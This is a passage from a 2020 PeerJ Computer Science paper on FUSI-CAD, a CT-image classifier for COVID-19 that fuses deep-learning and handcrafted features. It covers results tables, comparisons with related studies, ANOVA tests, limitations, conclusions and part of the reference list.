0.984 (0.006) 0.984 (0.006) 0.98 (0.005) 2,846.455 (1,607.139) Note: Bold values indicate the highest results. Figure 8 The classification scores for the four levels of DWT decomposition. Full-size DOI: 10.7717/peerj-cs.306/fig-8 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 18/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-8 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 to 99% each. In addition, the AUC rose to 1.00 (100%), as shown in the computed ROC curve in Fig. 9. A comparison between the accuracies of SVM classifiers constructed using individual DL features, individual HC features, DL feature fusion, HC feature fusion, and the proposed FUSI-CAD system is given in Fig. 10. As shown in Fig. 10 the accuracy of the proposed FUSI-CAD system attained the highest score. DISCUSSIONS Currently, the novel coronavirus is considered one of the global terrific health crisis. A quick and accurate diagnostic tool is vital to manage the propagation of this pandemic disease and assist radiologists in the diagnosis especially in high load conditions. The RT-PCR laboratory test is a well-known method to diagnose COVID-19, but it has poor sensitivity and inadequate availability. The test is also expensive, time-consuming, and requires a well-equipped laboratory for analysis (which is the main challenge particularly in developing countries). Therefore, a faster and efficient alternative diagnostic tool is of crucial need to help the front-line professionals to attain a fast and precise diagnosis. Medical imaging techniques such as CT is an effective tool to visualize the lungs and can assist the early diagnosis of COVID-19. However, it cannot achieve efficient diagnosis when used alone because of the likeness between patterns of the novel coronavirus and other types of pneumonia, which could confuse specialists and lead to misdiagnosis. On the other hand, CAD systems based on AI techniques have proven to have stronger discriminating ability to distinguish COVID-19 and non-COVID-19 patients, and more accurate and faster capabilities in the diagnosis the COVID-19 compared to the pathogenic exam, which consequently lessens the time desired for disease control (Butt et al., 2020; Shi, Han & Zheng, 2020). In this study, a faster and more accurate resolution was proposed instead of the RT-PCR test. The proposed resolution presented a novel CAD system called FUSI-CAD system. Table 5 A comparison between the classification scores obtained by the DL, HC feature fusion, and the FUSI-CAD system. Accuracy (std) (95% Confidence Interval) AUC (std) (95% Confidence Interval) Sensitivity (std) (95% Confidence Interval) Specificity (std) (95% Confidence Interval) Precision (std) (95% Confidence Interval) F1 score (std) (95% Confidence Interval) DOR (std) (95% Confidence Interval) DL FUSION 98.6% 1.00 0.981 0.99 0.99 0.986 4,851 (0.001) (0) (0.001) (0) (0) (0) (0) [0.985–0.986] [1–1] [0.981–0.981] [0.99–0.99] [0.99–0.99] [0.986–0.986] [4,851–4,851] HC FUSION 98% 0.995 0.976 0.984 0.984 0.98 2,846.455 (0.003) (0.006) (0.006) (0.006) (0.006) (0.005) (1,607.139) [0.978–0.981] [0.992–0.997] [0.973–0.978] [0.981–0.986] [0.981–0.986] [0.977–0.983] [1,968.2–3,724.7] FUSI-CAD 99% 1.00 0.99 0.99 0.99 0.99 9,801 (0.002) (0) (0) (0) (0) (0) (0) [0.988–0.991] [1–1] [0.99–0.99] [0.99–0.99] [0.99–0.99] [0.99–0.99] [9,801–9,801] Note: Bold values indicate the highest results. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 19/30 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Recent studies based on related image classification problems have suggested that fusing DL and handcrafted features can improve the performance of the classification model (Hasan et al., 2020; Wei et al., 2019a; Hansley, Segundo & Sarkar, 2018). Therefore, the FUSI-CAD system was based on the fusion of multiple DL features and handcrafted features extracted from CT images to investigate the effect of this fusion on the performance of the CAD system. Moreover, the proposed CAD system examined the influence of fusing multiple DL features extracted from four pre-trained CNNs on the classification performance as in stage (1). Furthermore, it studied the impact of fusing three handcrafted features such as DWT, GLCM, and statistical features on the classification performance as well as illustrated in stage (2). The proposed system is considered an important trial involving a simple to set up, low cost, and automated CAD system that can attain an accurate, effective, and fast diagnostic tool. Throughout this tough period of the global pandemic, the proposed FUSI-CAD system has huge potential to be considered as a COVID-19 diagnostic tool. It can attain early diagnosis of the novel corona disease, thus averting its rapid propagation. The FUSI-CAD system is an AI technique, which has a more powerful ability to distinguish between COVID-19 and non-COVID-19 CT images than manual diagnosis (Butt et al., 2020). The superiority of AI techniques were confirmed in related studies by various authors (Bai et al., 2020; Chen et al., 2020; Ardakani et al., 2020), who compared Figure 9 The ROC curve for the FUSI-CAD system. Full-size DOI: 10.7717/peerj-cs.306/fig-9 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 20/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-9 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 the accuracy of their CAD systems based on AI techniques, with the accuracy achieved by a manual diagnosis of radiologists without the aid of a CAD system. The performance attained by these studies verified that the AI based CAD systems were greater than the manual diagnosis by radiologists. The authors in Bai et al. (2020) indicated that their CAD system based on AI reached higher test accuracy (96% vs. 85%), the sensitivity of (95% vs. 79%), and specificity (96% vs. 88%) than radiologists. Similarly, in Ardakani et al. (2020) the results attained by the radiologist were worse than the authors’ proposed AI-based CAD system, with a sensitivity of (89.21% vs. 98.04%), a specificity of (83.33% vs. 98.04%), and an accuracy of (86.27% vs. 99.5%). Whereas, in Chen et al. (2020), the authors indicated that their AI based CAD system is capable of lowering the manual radiologist’s diagnosis time by 65%. This study proved that DL feature fusion could enhance the diagnosis of COVID-19 as the accuracy of the SVM classifiers had increased to 98.6%, which was higher than that of the individual DL features extracted from AlexNet, GoogleNet, ShuffleNet, and ResNet-18 CNNs as shown in Fig. 10. Moreover, the study indicated that fusing the handcrafted features had improved the accuracy of the SVM classifier to reach 98%, which was better than that of the DWT, GLCM, and statistical features separately. Furthermore, the performance of the proposed FUSI-CAD system verified that fusing DL and HC features had successfully improved the accuracy to reach 99%, which was higher than the other individual features of the DL methods, HC methods, the fused DL features, and fused HC features as shown in Fig. 10. The FUSI-CAD system performance was compared with recent related studies based on the same dataset to verify its competence. Table 6 shows a comparison between the performance metrics of the proposed FUSI-CAD system and recent related studies based Figure 10 Comparisons of individual DL features, individual handcrafted features, DL feature fusion, handcrafted feature fusion and the proposed FUSI-CAD system. Full-size DOI: 10.7717/peerj-cs.306/fig-10 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 21/30 http://dx.doi.org/10.7717/peerj-cs.306/fig-10 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 on the SARS-CoV-2 CT-scan dataset. The accuracy (99%), AUC (1.00), sensitivity (99%), specificity (99%), precision (99%), and F1 score (99%) were higher than the other methods. Soares et al. (2020) employed different separate CNNs such as; x-DNN, ResNet, GoogleNet, VGG-16, and AlexNet to classify COVID-19. They also used AdaBoosting and decision trees (DT) classifiers, however DT performance was lower than CNN. The highest result was achieved by x-DNN reaching an accuracy of 97.38%, AUC of 97.36%, sensitivity of 95.53%, precision of 99%, and F1 score of 97.31%. Whereas, the authors of Panwar et al. (2020) presented a deep transfer learning algorithm that quickens the detection of COVID-19. This method used gradient weighted class activation mapping (Grad-CAM) to visualize and plot class activation maps. This can assist in explaining more information about the CNN while carrying out the detection process. An accuracy of 95%, sensitivity of 96%, precision of 95%, and F1 score of 95% were attained, which were lower than FUSI-CAD system because this method used only one type of CNN to perform the detection. On the other hand, Pathak, Shukla & Arya, (2020) proposed a deep bidirectional long short-term memory (LSTM) network with mixture density network (DBM) model. A memetic adaptive differential evolution (MADE) algorithm was employed to tune the hyper-parameters of the DBM model. The model achieved an accuracy of 98.37%, AUC of 98.2%, sensitivity of 98.87%, precision of 98.74%, and F1 score of 98.14%. As it can be noted from Table 6 that the authors of Soares et al. (2020), Panwar et al. (2020) and Pathak, Shukla & Arya (2020) have utilized different individual CNNs networks. These authors did not neither fuse several CNNs architectures nor combine DL features with handcrafted features. However, the FUSI-CAD system fused multiple DL features with three HC features, which improved the performance of the CAD system and this is considered the main advantage of the FUSI-CAD system. These results proved the competitiveness of the FUSI-CAD system compared to other studies. Moreover, these results confirmed that the proposed FUSI-CAD system was capable of overcoming the constraint of using CT images only to diagnose the COVID-19 disease. Furthermore, according to what had been stated in Colquhoun (2014), Ellis (2010), Table 6 Comparison between the proposed FUSI-CAD system and the recent related studies on the SARS-CoV-2 CT-scan dataset. Paper Method Accuracy (%) AUC (%) Sensitivity (%) Precision (%) F1 score (%) Soares et al. (2020) x-DNN 97.38 97.36 95.53 99 97.31 ResNet 94.96 94.98 97.15 93 95.03 GoogleNet 91.73 91.79 93.5 90.2 91.82 VGG-16 94.96 94.96 95.43 94.02 94.97 AlexNet 93.75 93.68 92.28 94.48 93.61 Decision Tree 79.44 79.51 83.13 76.81 79.84 Adaboost 95.16 95.19 96.71 93.63 95.14 Panwar et al. (2020) CNN 95 – 96 95 95 Pathak, Shukla & Arya (2020) LSTM* 98.37 98.2 98.87 98.74 98.14 Proposed FUSI-CAD system 99 100 99 99 99 Notes: * LSTM: Long short-term memory. Bold values indicate the highest results. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 22/30 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Attallah (2020) that for a CAD system to be reliable, it must attain a sensitivity larger than or equal to 80%, specificity more than or equal to 95%, precision higher than or equal 95%, and a DOR greater than or equal 100. Therefore, the performance of the proposed FUSI-CAD system as in Table 5 verified that it is reliable and can be used to diagnose COVID-19. This was because the sensitivity, specificity, and precision achieved 99%, in addition to the DOR was 9802. The competing performance of the FUSI-CAD system revealed the idea of producing a diagnostic software tool by IT (information technology) solution companies. This tool can be portable and desirable to the end-user, such as radiologists or specialists, to assist the diagnosis procedure of the COVID-19. The performance of the proposed FUSI-CAD system was also compared with the related work presented in Table 1; it was observed that the CNN constructions were different from those used in the FUSI-CAD system. Concerning the ResNet CNN constructions, it was clear that the authors of the related work employed it with several layer architectures as in Butt et al. (2020), Li et al. (2020), Jin et al. (2020a, 2020b), Song et al. (2020b) and Ardakani et al. (2020). Butt et al. (2020) utilized the ResNet-18 and ResNet-23 CNNs to identify COVID-19 samples attaining an accuracy of 86.7%, which was beneath that of the FUSI-CAD system. This was because they used each network individually to perform the classification. Alternatively, Jin et al. (2020a) did the classification process using ResNet-152 CNN achieving an accuracy of 94.8%, which was lower than the accuracy of the FUSI-CAD system built with a fewer number of images. Li et al. (2020), Song et al. (2020b) and Jin et al. (2020b) employed the ResNet-50 CNN reaching an accuracy of 89.5%, 86%, and 94.8% respectively. The accuracies achieved by Li et al. (2020) and Song et al. (2020b), were much lower than the proposed FUSI-CAD system. This was because they used individual ResNet-50 networks trained with small amount of input images. However, the accuracy obtained by Jin et al. (2020b) was higher than Li et al. (2020) and Song et al. (2020b). This was due to the large amount of data employed by Jin et al. (2020b) method compared to Li et al. (2020) and Song et al. (2020b), but it was still lower than FUSI-CAD system. The reason for that was that FUSI-CAD system combined several DL features from CNNs architectures with three handcrafted textural analysis features. Instead, Ardakani et al. (2020) employed ResNet-101 CNN and achieved an accuracy of 99.51%. The reason for this high accuracy was that the authors used very high-resolution images and they divided the images into patches. Amyar, Modzelewski & Ruan (2020) and Chen et al. (2020) used the U-Net for the segmentation and/or classification procedures, the accuracies achieved were 86%, and 95.2%, respectively. The high accuracy achieved by Chen et al. (2020) was due to the huge number of images used to train their U-Nets, but it was still lower than the accuracy of proposed FUSI-CAD system. This was because FUSI-CAD system applied the feature fusion process, which enhanced the performance. Zheng et al. (2020) used a U-Net for segmenting CT images, and then they built a new CNN with eight layers. The accuracy attained 90.9%, which was much lower than achieved in FUSI-CAD system. Furthermore, He et al. (2020) had constructed a CAD system for coronavirus diagnosis based on DenseNet-169 CNN attaining an accuracy of 86%. Although, the DenseNet network architecture can perform well in case trained with a huge number of images, Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 23/30 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 which was not the case in He et al. method. On the other hand, the authors of Hasan et al. (2020) utilized DL features extracted from a new CNN architecture with a handcrafted feature extracted method and attained an accuracy of 99.68%, which was slightly higher than that that of the FUSI-CAD system. The reason for the slightly outperformance of Hasan et al. (2020) method was that the authors constructed a CNN with few number of convolutional layers to decrease the over-fitting by reducing the CNN construction complexity. Conversely, Fang et al. (2020) used the handcrafted features only and discarded the advantages of DL techniques and therefore, they attained a low AUC of 0.826 (82.6%). To test and validate the statistical significance of the results obtained, a one-way analysis of variance (ANOVA) test was performed by the repeated fivefold cross-validation procedure. The null hypothesis Ho for all classification was that the mean accuracies achieved in each experiment. Table 7 shows the results of ANOVA test made for the fused deep features (stage 1). Table 8 shows the results of ANOVA test made for the fused handcrafted features (stage 2). Table 9 presents the results of ANOVA test executed for the fused the fusion of the multiple deep features and handcrafted features (FUSI-CAD). It can be observed from Tables 7–9, that the p-values achieved were lower than 0.05. Therefore, it can be concluded that there was a statistically significant difference between the results calculated for each stage. Also the results of the test verify that FUSI-CAD is reliable. Moreover, the 95% confidence interval calculated for each stage of the proposed system proves that FUSI-CAD is reliable. Although the FUSI-CAD system outstanding performance, it still has some limitations. Meanwhile, the proposed system can only differentiate between COVID-19 and Table 7 The ANOVA test details for the deep feature fusion. Source of variation SS df MS F p-Value Columns 0.00209 5 0.00042 9384 <0.005 Error 0 54 0 Total 0.00209 59 Table 8 The ANOVA test details for the handcrafted feature fusion. Source of variation SS df MS F p-Value Columns 0.00234 5 0.00047 20.56 <0.005 Error 0.00137 60 0.00002 Total 0.00371 65 Table 9 The ANOVA test details for FUSI-CAD system. Source of variation SS df MS F p-Value Columns 0.00087 5 0.00017 728.44 <0.005 Error 0.00001 54 0 Total 0.00088 59 Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 24/30 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 non-COVID-19 images, but it is crucial to discriminate COVID-19 cases from other categories of pneumonia as well. In addition, the performance of the FUSI-CAD system was not compared with a manual diagnosis by a radiologist. Future work will focus on extending the model so that it would be able to identify other types of pneumonia, employing imaging techniques such as X-rays and constructing other types of CNNs. CONCLUSIONS Numerous studies have proved that AI techniques are capable of assisting radiologists in accurately identifying the novel coronavirus as well as speeding up the diagnosis process. This paper proposed an accurate and fast diagnostic tool called the FUSI-CAD system for distinguishing COVID-19 from non-COVID-19 cases as an alternative to the laboratory test, which has several drawbacks. FUSI-CAD system is based on the fusion of four DL features with three types of handcrafted features. The results showed that fusing multiple DL features had increased the performance of the classification model compared to the performance of the model constructed with individual DL features. In addition, the outcomes of this study proved that combining the three handcrafted features had increased the accuracy of the diagnosis of COVID-19. Additionally, the FUSI-CAD system had proved that fusing multiple DL and handcrafted features had a positive impact on the diagnosis of COVID-19. Furthermore, it revealed its competitive performance compared to similar studies based on the same dataset. Consequently, the FUSI-CAD system can be successfully used by radiologists to expedite the diagnosis procedure of COVID-19. Additionally, the FUSI-CAD system could help in controlling the present epidemic, accelerate the diagnosis of such virus, deaccelerate its spread, and enable clinicians to enhance the quality of patient management, even in unusual workload circumstances. The FUSI-CAD system must experience additional field-testing afore radiologists can engage it. Moreover, it will probably have to endure regulatory approval by health authorities before its implementation into hospitals. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Dina A. Ragab conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � Omneya Attallah conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 25/30 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Data Availability The following information was supplied regarding data availability: The dataset is available at Kaggle: Eduardo Soares and Plamen Angelov, “SARS-COV-2 Ct-Scan Dataset.” Kaggle, DOI 10.34740/KAGGLE/DSV/1199870. The data was described at: A Fully Automated Deep Learning-based Network For Detecting COVID-19 from a New And Large Lung CT Scan Dataset, Mohammad Rahimzadeh, Abolfazl Attar, Seyed Mohammad Sakhaei. medRxiv 2020.06.08.20121541; DOI 10.1101/2020.06.08.20121541. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.306#supplemental-information. REFERENCES Ai T, Yang Z, Hou H, Zhan C, Chen C, Lv W, Tao Q, Sun Z, Xia L. 2020. Correlation of chest CT and RT-PCR testing in coronavirus disease 2019 (COVID-19) in China: a report of 1014 cases. Radiology 200642(2):E32–E40 DOI 10.1148/radiol.2020200642. Al-Shamasneh AR, Jalab HA, Palaiahnakote S, Obaidellah UH, Ibrahim RW, El-Melegy MT. 2018. A new local fractional entropy-based model for kidney MRI image enhancement. Entropy 20(5):344 DOI 10.3390/e20050344. Amyar A, Modzelewski R, Ruan S. 2020. Multi-task deep learning based CT imaging analysis for COVID-19: classification and segmentation. medRxiv DOI 10.1101/2020.04.16.20064709. Anitha V, Murugavalli S. 2016. Brain tumour classification using two-tier classifier with adaptive segmentation technique. IET Computer Vision 10(1):9–17 DOI 10.1049/iet-cvi.2014.0193. Ardakani AA, Kanafi AR, Acharya UR, Khadem N, Mohammadi A. 2020. Application of deep learning technique to manage COVID-19 in routine clinical practice using CT images: results of 10 convolutional neural networks. Computers in Biology and Medicine 121:103795. Attallah O. 2020. An effective mental stress state detection and evaluation system using minimum number of frontal brain electrodes. Diagnostics 10(5):292–327 DOI 10.3390/diagnostics10050292. Attallah O, Gadelkarim H, Sharkas MA. 2018. Detecting and classifying fetal brain abnormalities using machine learning techniques. In: 2018 17th IEEE International Conference on Machine Learning and Applications (ICMLA). 1371–1376. Attallah O, Karthikesalingam A, Holt PJ, Thompson MM, Sayers R, Bown MJ, Choke EC, Ma X. 2017a. Using multiple classifiers for predicting the risk of endovascular aortic aneurysm repair re-intervention through hybrid feature selection. Proceedings of the Institution of Mechanical Engineers, Part H: Journal of Engineering in Medicine 231(11):1048–1063 DOI 10.1177/0954411917731592. Attallah O, Karthikesalingam A, Holt PJ, Thompson MM, Sayers R, Bown MJ, Choke EC, Ma X. 2017b. Feature selection through validation and un-censoring of endovascular repair survival data for predicting the risk of re-intervention. BMC medical informatics and decision making 17(1):115–133 DOI 10.1186/s12911-017-0508-3. Attallah O, Sharkas MA, Gadelkarim H. 2019. Fetal brain abnormality classification from MRI images of different gestational age. Brain Sciences 9(9):231–252 DOI 10.3390/brainsci9090231. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 26/30 https://dx.doi.org/10.34740/KAGGLE/DSV/1199870 https://dx.doi.org/10.1101/2020.06.08.20121541 http://dx.doi.org/10.7717/peerj-cs.306#supplemental-information http://dx.doi.org/10.7717/peerj-cs.306#supplemental-information http://dx.doi.org/10.1148/radiol.2020200642 http://dx.doi.org/10.3390/e20050344 http://dx.doi.org/10.1101/2020.04.16.20064709 http://dx.doi.org/10.1049/iet-cvi.2014.0193 http://dx.doi.org/10.3390/diagnostics10050292 http://dx.doi.org/10.1177/0954411917731592 http://dx.doi.org/10.1186/s12911-017-0508-3 http://dx.doi.org/10.3390/brainsci9090231 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Attallah O, Sharkas MA, Gadelkarim H. 2020. Deep learning techniques for automatic detection of embryonic neurodevelopmental disorders. Diagnostics 10(1):27–49 DOI 10.3390/diagnostics10010027. Bai HX, Wang R, Xiong Z, Hsieh B, Chang K, Halsey K, Tran TML, Choi JW, Wang D-C, Shi L- B. 2020. AI augmentation of radiologist performance in distinguishing COVID-19 from pneumonia of other etiology on chest CT. Radiology 296(3):201491. Butt C, Gill J, Chun D, Babu BA. 2020. Deep learning system to screen coronavirus disease 2019 pneumonia. Applied Intelligence 1(5):291 DOI 10.1007/s10489-020-01714-3. Capizzi G, Sciuto GL, Napoli C, Polap D, Woźniak M. 2019. Small lung nodules detection based on fuzzy-logic and probabilistic neural network with bio-inspired reinforcement learning. IEEE Transactions on Fuzzy Systems 28(6):1178–1189 DOI 10.1109/TFUZZ.91. Castellano G, Bonilha L, Li LM, Cendes F. 2004. Texture analysis of medical images. Clinical Radiology 59(12):1061–1069 DOI 10.1016/j.crad.2004.07.008. Chato L, Chow E, Latifi S. 2018. Wavelet transform to improve accuracy of a prediction model for overall survival time of brain tumor patients based on MRI images. In: 2018 IEEE International Conference on Healthcare Informatics (ICHI). 441–442. Chen J, Wu L, Zhang J, Zhang L, Gong D, Zhao Y, Hu S, Wang Y, Hu X, Zheng B. 2020. Deep learning-based model for detecting 2019 novel coronavirus pneumonia on high-resolution computed tomography: a prospective study. medRxiv DOI 10.1101/2020.02.25.20021568. Cheng Z, Qin L, Cao Q, Dai J, Pan A, Yang W, Gao Y, Chen L, Yan F. 2020. Quantitative computed tomography of the coronavirus disease 2019 (COVID-19) pneumonia. Radiology of Infectious Diseases 7(2):55–61. Chung M, Bernheim A, Mei X, Zhang N, Huang M, Zeng X, Cui J, Xu W, Yang Y, Fayad ZA. 2020. CT imaging features of 2019 novel coronavirus (2019-nCoV). Radiology 295(1):202–207 DOI 10.1148/radiol.2020200230. Colquhoun D. 2014. An investigation of the false discovery rate and the misinterpretation of p-values. Royal Society Open Science 1(3):140216 DOI 10.1098/rsos.140216. Depeursinge A, Al-Kadi OS, Ross Mitchell J. 2017. Biomedical texture analysis. First Edition. Cambridge: Academic Press. Dirvanauskas D, Maskeliunas R, Raudonis V, Damasevicius R. 2019. Embryo development stage prediction algorithm for automated time lapse incubators. Computer Methods and Programs in Biomedicine 177:161–174 DOI 10.1016/j.cmpb.2019.05.027. Dong D, Tang Z, Wang S, Hui H, Gong L, Lu Y, Xue Z, Liao H, Chen F, Yang F. 2020. The role of imaging in the detection and management of COVID-19: a review. Epub ahead of print 27 April 2020. IEEE Reviews in Biomedical Engineering DOI 10.1109/RBME.4664312. Ellis PD. 2010. The essential guide to effect sizes: Statistical power, meta-analysis, and the interpretation of research results. Cambridge: Cambridge University Press. Fang M, He B, Li L, Dong D, Yang X, Li C, Meng L, Zhong L, Li H, Li H. 2020. CT radiomics can help screen the coronavirus disease 2019 (COVID-19): a preliminary study. Science China Information Sciences. 63(7):172103. Girshick R, Donahue J, Darrell T, Malik J. 2014. Rich feature hierarchies for accurate object detection and semantic segmentation. In: Proceedings of the IEEE conference on computer vision and pattern recognition. 580–587. Hancer E, Xue B, Zhang M. 2018. Differential evolution for filter feature selection based on information theory and feature ranking. Knowledge-Based Systems 140:103–119 DOI 10.1016/j.knosys.2017.10.028. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 27/30 http://dx.doi.org/10.3390/diagnostics10010027 http://dx.doi.org/10.1007/s10489-020-01714-3 http://dx.doi.org/10.1109/TFUZZ.91 http://dx.doi.org/10.1016/j.crad.2004.07.008 http://dx.doi.org/10.1101/2020.02.25.20021568 http://dx.doi.org/10.1148/radiol.2020200230 http://dx.doi.org/10.1098/rsos.140216 http://dx.doi.org/10.1016/j.cmpb.2019.05.027 http://dx.doi.org/10.1109/RBME.4664312 http://dx.doi.org/10.1016/j.knosys.2017.10.028 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Hansley EE, Segundo MP, Sarkar S. 2018. Employing fusion of learned and handcrafted features for unconstrained ear recognition. IET Biometrics 7(3):215–223 DOI 10.1049/iet-bmt.2017.0210. Haralick RM, Shanmugam K, Dinstein I. 1973. Textural features for image classification. IEEE Transactions on Systems, Man, and Cybernetics SMC-3(6):610–621 DOI 10.1109/TSMC.1973.4309314. Hasan AM, AL-Jawad MM, Jalab HA, Shaiba H, Ibrahim RW, AL-Shamasneh AR. 2020. Classification of covid-19 coronavirus, pneumonia and healthy lungs in CT scans using Q-deformed entropy and deep learning features. Entropy 22(5):517 DOI 10.3390/e22050517. He X, Yang X, Zhang S, Zhao J, Zhang Y, Xing E, Xie P. 2020. Sample-efficient deep learning for COVID-19 diagnosis based on CT scans. medRxiv DOI 10.1101/2020.04.13.20063941. He K, Zhang X, Ren S, Sun J. 2016. Deep residual learning for image recognition. In: IEEE Conference on Computer Vision and Pattern Recognition. 770–778. Iwasawa T, Sato M, Yamaya T, Sato Y, Uchida Y, Kitamura H, Hagiwara E, Komatsu S, Utsunomiya D, Ogura T. 2020. Ultra-high-resolution computed tomography can demonstrate alveolar collapse in novel coronavirus (COVID-19) pneumonia. Japanese Journal of Radiology 38(5):394–398 DOI 10.1007/s11604-020-00956-y. Jin C, Chen W, Cao Y, Xu Z, Zhang X, Deng L, Zheng C, Zhou J, Shi H, Feng J. 2020a. Development and evaluation of an AI system for COVID-19 diagnosis. medRxiv DOI 10.1101/2020.03.20.20039834. Jin S, Wang B, Xu H, Luo C, Wei L, Zhao W, Hou X, Ma W, Xu Z, Zheng Z. 2020b. AI-assisted CT imaging analysis for COVID-19 screening: Building and deploying a medical AI system in four weeks. medRxiv DOI 10.1101/2020.03.19.20039354. Karthikesalingam A, Attallah O, Ma X, Bahia SS, Thompson L, Vidal-Diez A, Choke EC, Bown MJ, Sayers RD, Thompson MM. 2015. An artificial neural network stratifies the risks of Reintervention and mortality after endovascular aneurysm repair; a retrospective observational study. PLOS ONE 10(7):e0129024 DOI 10.1371/journal.pone.0129024. Kassner A, Thornhill RE. 2010. Texture analysis: a review of neurologic MR imaging applications. American Journal of Neuroradiology 31(5):809–816 DOI 10.3174/ajnr.A2061. Ke Q, Zhang J, Wei W, Po1ap D, Woźniak M, Kośmider L, Damaševĭcius R. 2019. A neuro-heuristic approach for recognition of lung diseases from X-ray images. Expert Systems with Applications 126:218–232. Kolossváry M, Karády J, Szilveszter B, Kitslaar P, Hoffmann U, Merkely B, Maurovich-Horvat P. 2017. Radiomic features are superior to conventional quantitative computed tomographic metrics to identify coronary plaques with napkin-ring sign. Circulation: Cardiovascular Imaging 10:e006843. Krizhevsky A, Sutskever I, Hinton GE. 2012. Imagenet classification with deep convolutional neural networks. In: Advances in Neural Information Processing Systems, Toronto: University of Toronto, 1097–1105. Lahmiri S, Boukadoum M. 2013. Hybrid discrete wavelet transform and gabor filter banks processing for features extraction from biomedical images. Journal of Medical Engineering 2013(7):1–13 DOI 10.1155/2013/104684. Lambin P, Rios-Velazquez E, Leijenaar R, Carvalho S, Van Stiphout RG, Granton P, Zegers CM, Gillies R, Boellard R, Dekker A. 2012. Radiomics: extracting more information from medical images using advanced feature analysis. European Journal of Cancer 48(4):441–446 DOI 10.1016/j.ejca.2011.11.036. Ragab and Attallah (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.306 28/30 http://dx.doi.org/10.1049/iet-bmt.2017.0210 http://dx.doi.org/10.1109/TSMC.1973.4309314 http://dx.doi.org/10.3390/e22050517 http://dx.doi.org/10.1101/2020.04.13.20063941 http://dx.doi.org/10.1007/s11604-020-00956-y http://dx.doi.org/10.1101/2020.03.20.20039834 http://dx.doi.org/10.1101/2020.03.19.20039354 http://dx.doi.org/10.1371/journal.pone.0129024 http://dx.doi.org/10.3174/ajnr.A2061 http://dx.doi.org/10.1155/2013/104684 http://dx.doi.org/10.1016/j.ejca.2011.11.036 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.306 Lei J, Li J, Li X, Qi X. 2020. CT imaging of the 2019 novel coronavirus (2019-nCoV) pneumonia. Radiology 295(1):18 DOI 10.1148/radiol.2020200236. Li L, Qin L, Xu Z, Yin Y, Wang X, Kong B, Bai J, Lu Y, Fang Z, Song Q. 2020. Artificial intelligence distinguishes covid-19 from community acquired pneumonia on chest CT. Epub ahead of print 19 March 2020. Radiology DOI 10.1148/radiol.2020200905. M.Pizer S, Amburn EP, DAustin J, Cromartie R, Geselowitz A, Greer T, Ter Haar Romeny B, Zimmerman JB, Zuiderveld K. 1987. Adaptive histogram equalization and its variations. Computer Vision, Graphics, and Image Processing 39(3):355–368 DOI 10.1016/S0734-189X(87)80186-X. Mallat SG. 1989. A theory for multiresolution signal decomposition: the wavelet representation. In: IEEE Transactions on Pattern Analysis and Machine Intelligence. 674–963. Nailon WH. 2010. Texture analysis methods for medical image characterisation. In: Biomedical Imaging. London: Intech Publishing. Nanni L, Ghidoni S, Brahnam S. 2017. Handcrafted vs. non-handcrafted features for computer vision classification. Pattern Recognition 71:158–172 DOI 10.1016/j.patcog.2017.05.025. Nguyen DT, Pham TD, Baek NR, Park KR. 2018. Combining deep and handcrafted image features for presentation attack detection in face recognition systems using visible-light camera sensors. Sensors 18(3):699 DOI 10.3390/s18030699. Panwar H, Gupta PK, Siddiqui MK, Morales-Menendez R, Bhardwaj P, Singh V. 2020. A deep learning and grad-CAM based color visualization approach for fast detection of COVID-19 cases using chest X-ray and CT-scan images. Chaos, Solitons & Fractals 140:110190. Pathak Y, Shukla PK, Arya KV. 2020. Deep bidirectional classification model for COVID-19 disease infected patients. In: IEEE/ACM Transactions on Computational Biology and Bioinformatic. Paules CI, Marston HD, Fauci AS. 2020. Coronavirus infections—more than just the common cold. JAMA 323(8):707–708 DOI 10.1001/jama.2020.0757. Pisano ED, Zong S, Hemminger BM, DeLuca M, Johnston RE, Muller K, Braeuning MP, Pizer SM. 1998. Contrast limited adaptive histogram equalization image processing to improve the detection of simulated spiculations in dense mammograms. Journal of Digital Imaging 11(4):193–200 DOI 10.1007/BF03178082. Ragab DA, Sharkas M, Attallah O. 2019. Breast cancer diagnosis using an efficient CAD system based on multiple classifiers. Diagnostics 9(4):165. Ragab DA, Sharkas M, Marshall S, Ren J. 2019. Breast cancer detection using deep convolutional neural networks and support vector machines. PeerJ 7(5):e6201 DOI 10.7717/peerj.6201. Ravì D, Wong C, Deligianni F, Berthelot M, Andreu-Perez J, Lo B, Yang G-Z. 2016. Deep learning for health informatics. IEEE journal of biomedical and health informatics 21:4–21. Sahakyan A, HS. 2012. Segmentation of the breast region in digital mammograms and detection of masses. International Journal of Advanced Computer 